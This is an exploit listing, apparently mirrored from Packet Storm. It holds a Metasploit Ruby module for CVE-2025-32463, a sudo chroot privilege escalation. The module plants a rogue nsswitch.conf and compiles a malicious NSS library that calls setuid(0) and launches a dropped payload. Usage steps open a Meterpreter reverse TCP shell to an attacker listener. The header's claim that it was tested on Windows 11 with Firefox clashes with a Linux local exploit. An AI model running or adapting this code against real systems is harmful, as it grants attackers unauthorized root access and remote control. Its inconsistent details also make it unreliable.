Share
## https://sploitus.com/exploit?id=PACKETSTORM:215998
=============================================================================================================================================
    | # Title     : sudo 1.9.17 Sudo Chroot Privilege Escalation                                                                                |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.sudo.ws/                                                                                                        |
    =============================================================================================================================================
    
    [+] Summary :
    
                 This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality. 
    			 The vulnerability allows attackers to load malicious NSS (Name Service Switch) modules from within a chroot environment, leading to arbitrary code execution as root.
    
    [+] Integration Methods :
    
    1. **Standalone Exploit Module**
    
       - Custom Ruby module for direct exploitation
       - Automated chroot environment setup
       - Payload execution as root
    
    2. **Payload Integration**
    
       - Modified NSS module with Meterpreter payload
       - Reverse TCP connection establishment
       - Root-level Meterpreter session
    
    3. **Multi-Handler Approach**
    
       - External exploit triggering Meterpreter
       - Payload delivery via HTTP/SMB
       - Session management through handler
    
    [+] Module Components :
    
    **Core Functions:**
    
    - `check()`: Verifies sudo chroot capability
    - `exploit()`: Main exploitation routine
    - `generate_nss_module()`: Creates malicious NSS library
    - `compile_nss_module()`: Compiles shared object
    
    **Exploitation Flow:**
    
    1. Vulnerability verification
    2. Chroot environment creation
    3. Malicious NSS module generation
    4. Payload integration
    5. Privilege escalation trigger
    6. Meterpreter session establishment
    
    [+] Usage  :
    
    
    use exploit/linux/local/sudo_chroot_priv_esc
    
    set SESSION 1
    
    set LHOST 192.168.1.100
    
    set LPORT 4444
    
    exploit
    
    or
    
    save as : sudo_chroot_exploit.rb
    
    use exploit/multi/handler
    
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    
    set LHOST 192.168.1.100
    
    set LPORT 4444
    
    set ExitOnSession false
    
    exploit -j
    
    [+] POC :
    
    ##
    # Module for CVE-2025-32463 Sudo Chroot Privilege Escalation
    ##
    
    require 'msf/core'
    
    class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking
    
      include Msf::Post::File
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)',
          'Description'    => %q{
            This module exploits CVE-2025-32463, a privilege escalation vulnerability
            in sudo's chroot functionality that allows loading malicious NSS modules.
          },
          'License'        => MSF_LICENSE,
          'Author'         => ['indoushka'],
          'References'     => [
            ['CVE', '2025-32463']
          ],
          'Platform'       => ['linux'],
          'Arch'           => [ARCH_X64, ARCH_X86],
          'SessionTypes'   => ['shell', 'meterpreter'],
          'Targets'        => [['Automatic', {}]],
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
            'PrependSetuid' => true
          },
          'DisclosureDate' => '2025-11-26',
          'DefaultTarget'  => 0
        ))
    
        register_options([
          OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
        ])
      end
    
      def check
        if command_exists?('sudo')
          check_cmd = 'sudo -n -l | grep -i chroot'
          result = cmd_exec(check_cmd)
          
          if result =~ /chroot/
            return Exploit::CheckCode::Appears
          else
            return Exploit::CheckCode::Safe
          end
        else
          return Exploit::CheckCode::Safe
        end
      end
    
      def exploit
        working_dir = "#{datastore['WritableDir']}/.chroot_exploit"
        cmd_exec("mkdir -p #{working_dir}/#{working_dir}/{lib,etc,bin}")
    
        nss_payload = generate_nss_module
        nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n"
        write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf)
    
        if compile_nss_module(working_dir, nss_payload)
          print_status("Malicious NSS module compiled successfully")
    
          print_status("Triggering privilege escalation...")
          cmd_exec("sudo -R #{working_dir} /bin/id")
    
          whoami = cmd_exec('whoami')
          if whoami =~ /root/
            print_good("Successfully obtained root privileges!")
    
            print_status("Executing payload as root...")
            cmd_exec("/bin/bash -c \"#{payload.encoded}\"")
          else
            print_error("Privilege escalation failed")
          end
        else
          print_error("Failed to compile NSS module")
        end
    
        cmd_exec("rm -rf #{working_dir}")
      end
    
      def generate_nss_module
        payload_file = "/tmp/.msf_payload"
        write_file(payload_file, payload.encoded)
        cmd_exec("chmod +x #{payload_file}")
    
        nss_code = %Q{
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <nss.h>
    #include <pwd.h>
    
    __attribute__((constructor)) void init() {
        unsetenv("LD_PRELOAD");
        setuid(0);
        setgid(0);
        system("#{payload_file} &");
        system("rm -f #{payload_file}");
    }
    
    enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
                                           char *buf, size_t buflen, int *errnop) {
        return NSS_STATUS_NOTFOUND;
    }
        }
        
        return nss_code
      end
    
      def compile_nss_module(working_dir, source_code)
        source_file = "#{working_dir}/payload.c"
        output_file = "#{working_dir}/lib/libnss_Xfiles.so.2"
        
        write_file(source_file, source_code)
        
        compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles"
        result = cmd_exec(compile_cmd)
        
        # Cleanup source
        cmd_exec("rm -f #{source_file}")
        
        return file_exist?(output_file)
      end
    
      def command_exists?(cmd)
        result = cmd_exec("which #{cmd}")
        return result.include?('/')
      end
    end
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================